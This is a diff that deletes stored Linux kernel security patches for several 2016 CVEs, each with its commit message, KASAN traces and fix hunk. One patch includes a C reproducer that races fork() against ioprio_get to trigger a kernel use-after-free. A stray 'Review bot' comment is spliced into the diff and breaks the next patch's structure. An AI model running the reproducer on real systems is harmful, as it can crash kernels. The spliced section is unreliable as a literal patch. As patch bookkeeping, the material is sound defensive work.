@@ -1,112 +0,0 @@ -From 77da160530dd1dc94f6ae15a981f24e5f0021e84 Mon Sep 17 00:00:00 2001 -From: Vegard Nossum -Date: Fri, 29 Jul 2016 10:40:31 +0200 -Subject: block: fix use-after-free in seq file - -I got a KASAN report of use-after-free: - - ================================================================== - BUG: KASAN: use-after-free in klist_iter_exit+0x61/0x70 at addr ffff8800b6581508 - Read of size 8 by task trinity-c1/315 - ============================================================================= - BUG kmalloc-32 (Not tainted): kasan: bad access detected - ----------------------------------------------------------------------------- - - Disabling lock debugging due to kernel taint - INFO: Allocated in disk_seqf_start+0x66/0x110 age=144 cpu=1 pid=315 - ___slab_alloc+0x4f1/0x520 - __slab_alloc.isra.58+0x56/0x80 - kmem_cache_alloc_trace+0x260/0x2a0 - disk_seqf_start+0x66/0x110 - traverse+0x176/0x860 - seq_read+0x7e3/0x11a0 - proc_reg_read+0xbc/0x180 - do_loop_readv_writev+0x134/0x210 - do_readv_writev+0x565/0x660 - vfs_readv+0x67/0xa0 - do_preadv+0x126/0x170 - SyS_preadv+0xc/0x10 - do_syscall_64+0x1a1/0x460 - return_from_SYSCALL_64+0x0/0x6a - INFO: Freed in disk_seqf_stop+0x42/0x50 age=160 cpu=1 pid=315 - __slab_free+0x17a/0x2c0 - kfree+0x20a/0x220 - disk_seqf_stop+0x42/0x50 - traverse+0x3b5/0x860 - seq_read+0x7e3/0x11a0 - proc_reg_read+0xbc/0x180 - do_loop_readv_writev+0x134/0x210 - do_readv_writev+0x565/0x660 - vfs_readv+0x67/0xa0 - do_preadv+0x126/0x170 - SyS_preadv+0xc/0x10 - do_syscall_64+0x1a1/0x460 - return_from_SYSCALL_64+0x0/0x6a - - CPU: 1 PID: 315 Comm: trinity-c1 Tainted: G B 4.7.0+ #62 - Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 - ffffea0002d96000 ffff880119b9f918 ffffffff81d6ce81 ffff88011a804480 - ffff8800b6581500 ffff880119b9f948 ffffffff8146c7bd ffff88011a804480 - ffffea0002d96000 ffff8800b6581500 fffffffffffffff4 ffff880119b9f970 - Call Trace: - [] dump_stack+0x65/0x84 - [] 
print_trailer+0x10d/0x1a0 - [] object_err+0x2f/0x40 - [] kasan_report_error+0x221/0x520 - [] __asan_report_load8_noabort+0x3e/0x40 - [] klist_iter_exit+0x61/0x70 - [] class_dev_iter_exit+0x9/0x10 - [] disk_seqf_stop+0x3a/0x50 - [] seq_read+0x4b2/0x11a0 - [] proc_reg_read+0xbc/0x180 - [] do_loop_readv_writev+0x134/0x210 - [] do_readv_writev+0x565/0x660 - [] vfs_readv+0x67/0xa0 - [] do_preadv+0x126/0x170 - [] SyS_preadv+0xc/0x10 - -This problem can occur in the following situation: - -open() - - pread() - - .seq_start() - - iter = kmalloc() // succeeds - - seqf->private = iter - - .seq_stop() - - kfree(seqf->private) - - pread() - - .seq_start() - - iter = kmalloc() // fails - - .seq_stop() - - class_dev_iter_exit(seqf->private) // boom! old pointer - -As the comment in disk_seqf_stop() says, stop is called even if start -failed, so we need to reinitialise the private pointer to NULL when seq -iteration stops. - -An alternative would be to set the private pointer to NULL when the -kmalloc() in disk_seqf_start() fails. - -Cc: stable@vger.kernel.org -Signed-off-by: Vegard Nossum -Acked-by: Tejun Heo -Signed-off-by: Jens Axboe ---- - block/genhd.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/block/genhd.c b/block/genhd.c -index 3c9dede..0ad8796 100644 ---- a/block/genhd.c -+++ b/block/genhd.c -@@ -856,6 +856,7 @@ static void disk_seqf_stop(struct seq_file *seqf, void *v) - if (iter) { - class_dev_iter_exit(iter); - kfree(iter); -+ seqf->private = NULL; - } - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-7911/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7911/ANY/0001.patch deleted file mode 100644 index 99e2ddff..00000000 --- a/Patches/Linux_CVEs/CVE-2016-7911/ANY/0001.patch +++ /dev/null 
@@ -1,123 +0,0 @@ -From 8ba8682107ee2ca3347354e018865d8e1967c5f4 Mon Sep 17 00:00:00 2001 -From: Omar Sandoval -Date: Fri, 1 Jul 2016 00:39:35 -0700 -Subject: block: fix use-after-free in sys_ioprio_get() - -get_task_ioprio() accesses the task->io_context without holding the task -lock and thus can race with exit_io_context(), leading to a -use-after-free. The reproducer below hits this within a few seconds on -my 4-core QEMU VM: - -#define _GNU_SOURCE -#include -#include -#include -#include - -int main(int argc, char **argv) -{ - pid_t pid, child; - long nproc, i; - - /* ioprio_set(IOPRIO_WHO_PROCESS, 0, IOPRIO_PRIO_VALUE(IOPRIO_CLASS_IDLE, 0)); */ - syscall(SYS_ioprio_set, 1, 0, 0x6000); - - nproc = sysconf(_SC_NPROCESSORS_ONLN); - - for (i = 0; i < nproc; i++) { - pid = fork(); - assert(pid != -1); - if (pid == 0) { - for (;;) { - pid = fork(); - assert(pid != -1); - if (pid == 0) { - _exit(0); - } else { - child = wait(NULL); - assert(child == pid); - } - } - } - - pid = fork(); - assert(pid != -1); - if (pid == 0) { - for (;;) { - /* ioprio_get(IOPRIO_WHO_PGRP, 0); */ - syscall(SYS_ioprio_get, 2, 0); - } - } - } - - for (;;) { - /* ioprio_get(IOPRIO_WHO_PGRP, 0); */ - syscall(SYS_ioprio_get, 2, 0); - } - - return 0; -} - -This gets us KASAN dumps like this: - -[ 35.526914] ================================================================== -[ 35.530009] BUG: KASAN: out-of-bounds in get_task_ioprio+0x7b/0x90 at addr ffff880066f34e6c -[ 35.530009] Read of size 2 by task ioprio-gpf/363 -[ 35.530009] ============================================================================= -[ 35.530009] BUG blkdev_ioc (Not tainted): kasan: bad access detected -[ 35.530009] ----------------------------------------------------------------------------- - -[ 35.530009] Disabling lock debugging due to kernel taint -[ 35.530009] INFO: Allocated in create_task_io_context+0x2b/0x370 age=0 cpu=0 pid=360 -[ 35.530009] ___slab_alloc+0x55d/0x5a0 -[ 35.530009] __slab_alloc.isra.20+0x2b/0x40 
-[ 35.530009] kmem_cache_alloc_node+0x84/0x200 -[ 35.530009] create_task_io_context+0x2b/0x370 -[ 35.530009] get_task_io_context+0x92/0xb0 -[ 35.530009] copy_process.part.8+0x5029/0x5660 -[ 35.530009] _do_fork+0x155/0x7e0 -[ 35.530009] SyS_clone+0x19/0x20 -[ 35.530009] do_syscall_64+0x195/0x3a0 -[ 35.530009] return_from_SYSCALL_64+0x0/0x6a -[ 35.530009] INFO: Freed in put_io_context+0xe7/0x120 age=0 cpu=0 pid=1060 -[ 35.530009] __slab_free+0x27b/0x3d0 -[ 35.530009] kmem_cache_free+0x1fb/0x220 -[ 35.530009] put_io_context+0xe7/0x120 -[ 35.530009] put_io_context_active+0x238/0x380 -[ 35.530009] exit_io_context+0x66/0x80 -[ 35.530009] do_exit+0x158e/0x2b90 -[ 35.530009] do_group_exit+0xe5/0x2b0 -[ 35.530009] SyS_exit_group+0x1d/0x20 -[ 35.530009] entry_SYSCALL_64_fastpath+0x1a/0xa4 -[ 35.530009] INFO: Slab 0xffffea00019bcd00 objects=20 used=4 fp=0xffff880066f34ff0 flags=0x1fffe0000004080 -[ 35.530009] INFO: Object 0xffff880066f34e58 @offset=3672 fp=0x0000000000000001 -[ 35.530009] ================================================================== - -Fix it by grabbing the task lock while we poke at the io_context. - -Cc: stable@vger.kernel.org -Reported-by: Dmitry Vyukov -Signed-off-by: Omar Sandoval -Signed-off-by: Jens Axboe ---- - block/ioprio.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/block/ioprio.c b/block/ioprio.c -index cc7800e..01b8116 100644 ---- a/block/ioprio.c -+++ b/block/ioprio.c -@@ -150,8 +150,10 @@ static int get_task_ioprio(struct task_struct *p) - if (ret) - goto out; - ret = IOPRIO_PRIO_VALUE(IOPRIO_CLASS_NONE, IOPRIO_NORM); -+ task_lock(p); - if (p->io_context) - ret = p->io_context->ioprio; -+ task_unlock(p); - out: - return ret; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-7912/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7912/ANY/0001.patch deleted file mode 100644 index 03c5bdbe..00000000 --- a/Patches/Linux_CVEs/CVE-2016-7912/ANY/0001.patch +++ /dev/null 
@@ -1,51 +0,0 @@
-From 38740a5b87d53ceb89eb2c970150f6e94e00373a Mon Sep 17 00:00:00 2001
-From: Lars-Peter Clausen
-Date: Thu, 14 Apr 2016 17:01:17 +0200
-Subject: usb: gadget: f_fs: Fix use-after-free
-
-When using asynchronous read or write operations on the USB endpoints the
-issuer of the IO request is notified by calling the ki_complete() callback
-of the submitted kiocb when the URB has been completed.
-
-Calling this ki_complete() callback will free kiocb. Make sure that the
-structure is no longer accessed beyond that point, otherwise undefined
-behaviour might occur.
-
-Fixes: 2e4c7553cd6f ("usb: gadget: f_fs: add aio support")
-Cc: # v3.15+
-Signed-off-by: Lars-Peter Clausen
-Signed-off-by: Felipe Balbi
----
- drivers/usb/gadget/function/f_fs.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
-index e21ca2bd..15b648c 100644
---- a/drivers/usb/gadget/function/f_fs.c
-+++ b/drivers/usb/gadget/function/f_fs.c
-@@ -646,6 +646,7 @@ static void ffs_user_copy_worker(struct work_struct *work)
- work);
- int ret = io_data->req->status ? io_data->req->status :
- io_data->req->actual;
-+ bool kiocb_has_eventfd = io_data->kiocb->ki_flags & IOCB_EVENTFD;
-
- if (io_data->read && ret > 0) {
- use_mm(io_data->mm);
-@@ -657,13 +658,11 @@ static void ffs_user_copy_worker(struct work_struct *work)
-
- io_data->kiocb->ki_complete(io_data->kiocb, ret, ret);
-
-- if (io_data->ffs->ffs_eventfd &&
-- !(io_data->kiocb->ki_flags & IOCB_EVENTFD))
-+ if (io_data->ffs->ffs_eventfd && !kiocb_has_eventfd)
- eventfd_signal(io_data->ffs->ffs_eventfd, 1);
-
- usb_ep_free_request(io_data->ep, io_data->req);
-
-- io_data->kiocb->private = NULL;
- if (io_data->read)
- kfree(io_data->to_free);
- kfree(io_data->buf);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7913/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7913/ANY/0001.patch
deleted file mode 100644
index 26af8224..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7913/ANY/0001.patch
+++ /dev/null
@@ -1,162 +0,0 @@ -From 8dfbcc4351a0b6d2f2d77f367552f48ffefafe18 Mon Sep 17 00:00:00 2001 -From: Mauro Carvalho Chehab -Date: Thu, 28 Jan 2016 09:22:44 -0200 -Subject: [media] xc2028: avoid use after free - -If struct xc2028_config is passed without a firmware name, -the following trouble may happen: - -[11009.907205] xc2028 5-0061: type set to XCeive xc2028/xc3028 tuner -[11009.907491] ================================================================== -[11009.907750] BUG: KASAN: use-after-free in strcmp+0x96/0xb0 at addr ffff8803bd78ab40 -[11009.907992] Read of size 1 by task modprobe/28992 -[11009.907994] ============================================================================= -[11009.907997] BUG kmalloc-16 (Tainted: G W ): kasan: bad access detected -[11009.907999] ----------------------------------------------------------------------------- - -[11009.908008] INFO: Allocated in xhci_urb_enqueue+0x214/0x14c0 [xhci_hcd] age=0 cpu=3 pid=28992 -[11009.908012] ___slab_alloc+0x581/0x5b0 -[11009.908014] __slab_alloc+0x51/0x90 -[11009.908017] __kmalloc+0x27b/0x350 -[11009.908022] xhci_urb_enqueue+0x214/0x14c0 [xhci_hcd] -[11009.908026] usb_hcd_submit_urb+0x1e8/0x1c60 -[11009.908029] usb_submit_urb+0xb0e/0x1200 -[11009.908032] usb_serial_generic_write_start+0xb6/0x4c0 -[11009.908035] usb_serial_generic_write+0x92/0xc0 -[11009.908039] usb_console_write+0x38a/0x560 -[11009.908045] call_console_drivers.constprop.14+0x1ee/0x2c0 -[11009.908051] console_unlock+0x40d/0x900 -[11009.908056] vprintk_emit+0x4b4/0x830 -[11009.908061] vprintk_default+0x1f/0x30 -[11009.908064] printk+0x99/0xb5 -[11009.908067] kasan_report_error+0x10a/0x550 -[11009.908070] __asan_report_load1_noabort+0x43/0x50 -[11009.908074] INFO: Freed in xc2028_set_config+0x90/0x630 [tuner_xc2028] age=1 cpu=3 pid=28992 -[11009.908077] __slab_free+0x2ec/0x460 -[11009.908080] kfree+0x266/0x280 -[11009.908083] xc2028_set_config+0x90/0x630 [tuner_xc2028] -[11009.908086] xc2028_attach+0x310/0x8a0 [tuner_xc2028] 
-[11009.908090] em28xx_attach_xc3028.constprop.7+0x1f9/0x30d [em28xx_dvb] -[11009.908094] em28xx_dvb_init.part.3+0x8e4/0x5cf4 [em28xx_dvb] -[11009.908098] em28xx_dvb_init+0x81/0x8a [em28xx_dvb] -[11009.908101] em28xx_register_extension+0xd9/0x190 [em28xx] -[11009.908105] em28xx_dvb_register+0x10/0x1000 [em28xx_dvb] -[11009.908108] do_one_initcall+0x141/0x300 -[11009.908111] do_init_module+0x1d0/0x5ad -[11009.908114] load_module+0x6666/0x9ba0 -[11009.908117] SyS_finit_module+0x108/0x130 -[11009.908120] entry_SYSCALL_64_fastpath+0x16/0x76 -[11009.908123] INFO: Slab 0xffffea000ef5e280 objects=25 used=25 fp=0x (null) flags=0x2ffff8000004080 -[11009.908126] INFO: Object 0xffff8803bd78ab40 @offset=2880 fp=0x0000000000000001 - -[11009.908130] Bytes b4 ffff8803bd78ab30: 01 00 00 00 2a 07 00 00 9d 28 00 00 01 00 00 00 ....*....(...... -[11009.908133] Object ffff8803bd78ab40: 01 00 00 00 00 00 00 00 b0 1d c3 6a 00 88 ff ff ...........j.... -[11009.908137] CPU: 3 PID: 28992 Comm: modprobe Tainted: G B W 4.5.0-rc1+ #43 -[11009.908140] Hardware name: /NUC5i7RYB, BIOS RYBDWi35.86A.0350.2015.0812.1722 08/12/2015 -[11009.908142] ffff8803bd78a000 ffff8802c273f1b8 ffffffff81932007 ffff8803c6407a80 -[11009.908148] ffff8802c273f1e8 ffffffff81556759 ffff8803c6407a80 ffffea000ef5e280 -[11009.908153] ffff8803bd78ab40 dffffc0000000000 ffff8802c273f210 ffffffff8155ccb4 -[11009.908158] Call Trace: -[11009.908162] [] dump_stack+0x4b/0x64 -[11009.908165] [] print_trailer+0xf9/0x150 -[11009.908168] [] object_err+0x34/0x40 -[11009.908171] [] kasan_report_error+0x230/0x550 -[11009.908175] [] ? trace_hardirqs_off_caller+0x21/0x290 -[11009.908179] [] ? kasan_unpoison_shadow+0x36/0x50 -[11009.908182] [] __asan_report_load1_noabort+0x43/0x50 -[11009.908185] [] ? __asan_register_globals+0x50/0xa0 -[11009.908189] [] ? 
strcmp+0x96/0xb0 -[11009.908192] [] strcmp+0x96/0xb0 -[11009.908196] [] xc2028_set_config+0x15c/0x630 [tuner_xc2028] -[11009.908200] [] xc2028_attach+0x310/0x8a0 [tuner_xc2028] -[11009.908203] [] ? memset+0x28/0x30 -[11009.908206] [] ? xc2028_set_config+0x630/0x630 [tuner_xc2028] -[11009.908211] [] em28xx_attach_xc3028.constprop.7+0x1f9/0x30d [em28xx_dvb] -[11009.908215] [] ? em28xx_dvb_init.part.3+0x37c/0x5cf4 [em28xx_dvb] -[11009.908219] [] ? hauppauge_hvr930c_init+0x487/0x487 [em28xx_dvb] -[11009.908222] [] ? lgdt330x_attach+0x1cc/0x370 [lgdt330x] -[11009.908226] [] ? i2c_read_demod_bytes.isra.2+0x210/0x210 [lgdt330x] -[11009.908230] [] ? ref_module.part.15+0x10/0x10 -[11009.908233] [] ? module_assert_mutex_or_preempt+0x80/0x80 -[11009.908238] [] em28xx_dvb_init.part.3+0x8e4/0x5cf4 [em28xx_dvb] -[11009.908242] [] ? em28xx_attach_xc3028.constprop.7+0x30d/0x30d [em28xx_dvb] -[11009.908245] [] ? string+0x14d/0x1f0 -[11009.908249] [] ? symbol_string+0xff/0x1a0 -[11009.908253] [] ? uuid_string+0x6f0/0x6f0 -[11009.908257] [] ? __kernel_text_address+0x7e/0xa0 -[11009.908260] [] ? print_context_stack+0x7f/0xf0 -[11009.908264] [] ? __module_address+0xb6/0x360 -[11009.908268] [] ? is_ftrace_trampoline+0x99/0xe0 -[11009.908271] [] ? __kernel_text_address+0x7e/0xa0 -[11009.908275] [] ? debug_check_no_locks_freed+0x290/0x290 -[11009.908278] [] ? dump_trace+0x11b/0x300 -[11009.908282] [] ? em28xx_register_extension+0x23/0x190 [em28xx] -[11009.908285] [] ? trace_hardirqs_off_caller+0x21/0x290 -[11009.908289] [] ? trace_hardirqs_on_caller+0x16/0x590 -[11009.908292] [] ? trace_hardirqs_on+0xd/0x10 -[11009.908296] [] ? em28xx_register_extension+0x23/0x190 [em28xx] -[11009.908299] [] ? mutex_trylock+0x400/0x400 -[11009.908302] [] ? do_one_initcall+0x131/0x300 -[11009.908306] [] ? call_rcu_sched+0x17/0x20 -[11009.908309] [] ? 
put_object+0x48/0x70 -[11009.908314] [] em28xx_dvb_init+0x81/0x8a [em28xx_dvb] -[11009.908317] [] em28xx_register_extension+0xd9/0x190 [em28xx] -[11009.908320] [] ? 0xffffffffa0150000 -[11009.908324] [] em28xx_dvb_register+0x10/0x1000 [em28xx_dvb] -[11009.908327] [] do_one_initcall+0x141/0x300 -[11009.908330] [] ? try_to_run_init_process+0x40/0x40 -[11009.908333] [] ? trace_hardirqs_on_caller+0x16/0x590 -[11009.908337] [] ? kasan_unpoison_shadow+0x36/0x50 -[11009.908340] [] ? kasan_unpoison_shadow+0x36/0x50 -[11009.908343] [] ? kasan_unpoison_shadow+0x36/0x50 -[11009.908346] [] ? __asan_register_globals+0x87/0xa0 -[11009.908350] [] do_init_module+0x1d0/0x5ad -[11009.908353] [] load_module+0x6666/0x9ba0 -[11009.908356] [] ? symbol_put_addr+0x50/0x50 -[11009.908361] [] ? em28xx_dvb_init.part.3+0x5989/0x5cf4 [em28xx_dvb] -[11009.908366] [] ? module_frob_arch_sections+0x20/0x20 -[11009.908369] [] ? open_exec+0x50/0x50 -[11009.908374] [] ? ns_capable+0x5b/0xd0 -[11009.908377] [] SyS_finit_module+0x108/0x130 -[11009.908379] [] ? SyS_init_module+0x1f0/0x1f0 -[11009.908383] [] ? lockdep_sys_exit_thunk+0x12/0x14 -[11009.908394] [] entry_SYSCALL_64_fastpath+0x16/0x76 -[11009.908396] Memory state around the buggy address: -[11009.908398] ffff8803bd78aa00: 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc -[11009.908401] ffff8803bd78aa80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc -[11009.908403] >ffff8803bd78ab00: fc fc fc fc fc fc fc fc 00 00 fc fc fc fc fc fc -[11009.908405] ^ -[11009.908407] ffff8803bd78ab80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc -[11009.908409] ffff8803bd78ac00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc -[11009.908411] ================================================================== - -In order to avoid it, let's set the cached value of the firmware -name to NULL after freeing it. While here, return an error if -the memory allocation fails. 
- -Signed-off-by: Mauro Carvalho Chehab ---- - drivers/media/tuners/tuner-xc2028.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/drivers/media/tuners/tuner-xc2028.c b/drivers/media/tuners/tuner-xc2028.c -index 4e941f0..082ff56 100644 ---- a/drivers/media/tuners/tuner-xc2028.c -+++ b/drivers/media/tuners/tuner-xc2028.c -@@ -1403,11 +1403,12 @@ static int xc2028_set_config(struct dvb_frontend *fe, void *priv_cfg) - * in order to avoid troubles during device release. - */ - kfree(priv->ctrl.fname); -+ priv->ctrl.fname = NULL; - memcpy(&priv->ctrl, p, sizeof(priv->ctrl)); - if (p->fname) { - priv->ctrl.fname = kstrdup(p->fname, GFP_KERNEL); - if (priv->ctrl.fname == NULL) -- rc = -ENOMEM; -+ return -ENOMEM; - } - - /* --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-7914/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7914/ANY/0001.patch deleted file mode 100644 index 7d535a0a..00000000 --- a/Patches/Linux_CVEs/CVE-2016-7914/ANY/0001.patch +++ /dev/null 
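Review bot: The added `return -ENOMEM;` in the embedded tuner-xc2028.c hunk leaves xc2028_set_config() at once, whereas the line it replaces only set `rc` and carried on to the rest of the function. The function starts and ends outside the hunk, so this is hedged: if a lock is held at this point or the function has a common exit that releases resources, the allocation-failure path now skips it. Keeping a single exit avoids that: set `rc = -ENOMEM;` and jump to the function's existing unlock/exit code instead of returning directly.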
@@ -1,112 +0,0 @@
-From 8d4a2ec1e0b41b0cf9a0c5cd4511da7f8e4f3de2 Mon Sep 17 00:00:00 2001
-From: Jerome Marchand
-Date: Wed, 6 Apr 2016 14:06:48 +0100
-Subject: assoc_array: don't call compare_object() on a node
-
-Changes since V1: fixed the description and added KASan warning.
-
-In assoc_array_insert_into_terminal_node(), we call the
-compare_object() method on all non-empty slots, even when they're
-not leaves, passing a pointer to an unexpected structure to
-compare_object(). Currently it causes an out-of-bound read access
-in keyring_compare_object detected by KASan (see below). The issue
-is easily reproduced with keyutils testsuite.
-Only call compare_object() when the slot is a leave.
-
-KASan warning:
-==================================================================
-BUG: KASAN: slab-out-of-bounds in keyring_compare_object+0x213/0x240 at addr ffff880060a6f838
-Read of size 8 by task keyctl/1655
-=============================================================================
-BUG kmalloc-192 (Not tainted): kasan: bad access detected
------------------------------------------------------------------------------
-
-Disabling lock debugging due to kernel taint
-INFO: Allocated in assoc_array_insert+0xfd0/0x3a60 age=69 cpu=1 pid=1647
- ___slab_alloc+0x563/0x5c0
- __slab_alloc+0x51/0x90
- kmem_cache_alloc_trace+0x263/0x300
- assoc_array_insert+0xfd0/0x3a60
- __key_link_begin+0xfc/0x270
- key_create_or_update+0x459/0xaf0
- SyS_add_key+0x1ba/0x350
- entry_SYSCALL_64_fastpath+0x12/0x76
-INFO: Slab 0xffffea0001829b80 objects=16 used=8 fp=0xffff880060a6f550 flags=0x3fff8000004080
-INFO: Object 0xffff880060a6f740 @offset=5952 fp=0xffff880060a6e5d1
-
-Bytes b4 ffff880060a6f730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f740: d1 e5 a6 60 00 88 ff ff 0e 00 00 00 00 00 00 00 ...`............
-Object ffff880060a6f750: 02 cf 8e 60 00 88 ff ff 02 c0 8e 60 00 88 ff ff ...`.......`....
-Object ffff880060a6f760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f7a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f7b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f7d0: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-Object ffff880060a6f7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-CPU: 0 PID: 1655 Comm: keyctl Tainted: G B 4.5.0-rc4-kasan+ #291
-Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
- 0000000000000000 000000001b2800b4 ffff880060a179e0 ffffffff81b60491
- ffff88006c802900 ffff880060a6f740 ffff880060a17a10 ffffffff815e2969
- ffff88006c802900 ffffea0001829b80 ffff880060a6f740 ffff880060a6e650
-Call Trace:
- [] dump_stack+0x85/0xc4
- [] print_trailer+0xf9/0x150
- [] object_err+0x34/0x40
- [] kasan_report_error+0x230/0x550
- [] ? keyring_get_key_chunk+0x13e/0x210
- [] __asan_report_load_n_noabort+0x5d/0x70
- [] ? keyring_compare_object+0x213/0x240
- [] keyring_compare_object+0x213/0x240
- [] assoc_array_insert+0x86c/0x3a60
- [] ? assoc_array_cancel_edit+0x70/0x70
- [] ? __key_link_begin+0x20d/0x270
- [] __key_link_begin+0xfc/0x270
- [] key_create_or_update+0x459/0xaf0
- [] ? trace_hardirqs_on+0xd/0x10
- [] ? key_type_lookup+0xc0/0xc0
- [] ? lookup_user_key+0x13d/0xcd0
- [] ? memdup_user+0x53/0x80
- [] SyS_add_key+0x1ba/0x350
- [] ? key_get_type_from_user.constprop.6+0xa0/0xa0
- [] ? retint_user+0x18/0x23
- [] ?
trace_hardirqs_on_caller+0x3fe/0x580
- [] ? trace_hardirqs_on_thunk+0x17/0x19
- [] entry_SYSCALL_64_fastpath+0x12/0x76
-Memory state around the buggy address:
- ffff880060a6f700: fc fc fc fc fc fc fc fc 00 00 00 00 00 00 00 00
- ffff880060a6f780: 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc fc
->ffff880060a6f800: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ^
- ffff880060a6f880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffff880060a6f900: fc fc fc fc fc fc 00 00 00 00 00 00 00 00 00 00
-==================================================================
-
-Signed-off-by: Jerome Marchand
-Signed-off-by: David Howells
-cc: stable@vger.kernel.org
----
- lib/assoc_array.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/lib/assoc_array.c b/lib/assoc_array.c
-index 03dd576..59fd7c0 100644
---- a/lib/assoc_array.c
-+++ b/lib/assoc_array.c
-@@ -524,7 +524,9 @@ static bool assoc_array_insert_into_terminal_node(struct assoc_array_edit *edit,
- free_slot = i;
- continue;
- }
-- if (ops->compare_object(assoc_array_ptr_to_leaf(ptr), index_key)) {
-+ if (assoc_array_ptr_is_leaf(ptr) &&
-+ ops->compare_object(assoc_array_ptr_to_leaf(ptr),
-+ index_key)) {
- pr_devel("replace in slot %d\n", i);
- edit->leaf_p = &node->slots[i];
- edit->dead_leaf = node->slots[i];
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7915/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7915/ANY/0001.patch
deleted file mode 100644
index a37e499e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7915/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 50220dead1650609206efe91f0cc116132d59b3f Mon Sep 17 00:00:00 2001
-From: Benjamin Tissoires
-Date: Tue, 19 Jan 2016 12:34:58 +0100
-Subject: HID: core: prevent out-of-bound readings
-
-Plugging a Logitech DJ receiver with KASAN activated raises a bunch of
-out-of-bound readings.
-
-The fields are allocated up to MAX_USAGE, meaning that potentially, we do
-not have enough fields to fit the incoming values.
-Add checks and silence KASAN.
-
-Signed-off-by: Benjamin Tissoires
-Signed-off-by: Jiri Kosina
----
- drivers/hid/hid-core.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
-index 16c2c66..3f6ac5f 100644
---- a/drivers/hid/hid-core.c
-+++ b/drivers/hid/hid-core.c
-@@ -1293,6 +1293,7 @@ static void hid_input_field(struct hid_device *hid, struct hid_field *field,
- /* Ignore report if ErrorRollOver */
- if (!(field->flags & HID_MAIN_ITEM_VARIABLE) &&
- value[n] >= min && value[n] <= max &&
-+ value[n] - min < field->maxusage &&
- field->usage[value[n] - min].hid == HID_UP_KEYBOARD + 1)
- goto exit;
- }
-@@ -1305,11 +1306,13 @@ static void hid_input_field(struct hid_device *hid, struct hid_field *field,
- }
-
- if (field->value[n] >= min && field->value[n] <= max
-+ && field->value[n] - min < field->maxusage
- && field->usage[field->value[n] - min].hid
- && search(value, field->value[n], count))
- hid_process_event(hid, field, &field->usage[field->value[n] - min], 0, interrupt);
-
- if (value[n] >= min && value[n] <= max
-+ && value[n] - min < field->maxusage
- && field->usage[value[n] - min].hid
- && search(field->value, value[n], count))
- hid_process_event(hid, field, &field->usage[value[n] - min], 1, interrupt);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7916/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7916/ANY/0001.patch
deleted file mode 100644
index 310cb3ec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7916/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 8148a73c9901a8794a50f950083c00ccf97d43b3 Mon Sep 17 00:00:00 2001
-From: Mathias Krause
-Date: Thu, 5 May 2016 16:22:26 -0700
-Subject: proc: prevent accessing /proc//environ until it's ready
-
-If /proc//environ gets read before the envp[] array is fully set up
-in create_{aout,elf,elf_fdpic,flat}_tables(), we might end up trying to
-read more bytes than are actually written, as env_start will already be
-set but env_end will still be zero, making the range calculation
-underflow, allowing to read beyond the end of what has been written.
-
-Fix this as it is done for /proc//cmdline by testing env_end for
-zero. It is, apparently, intentionally set last in create_*_tables().
-
-This bug was found by the PaX size_overflow plugin that detected the
-arithmetic underflow of 'this_len = env_end - (env_start + src)' when
-env_end is still zero.
-
-The expected consequence is that userland trying to access
-/proc//environ of a not yet fully set up process may get
-inconsistent data as we're in the middle of copying in the environment
-variables.
-
-Fixes: https://forums.grsecurity.net/viewtopic.php?f=3&t=4363
-Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=116461
-Signed-off-by: Mathias Krause
-Cc: Emese Revfy
-Cc: Pax Team
-Cc: Al Viro
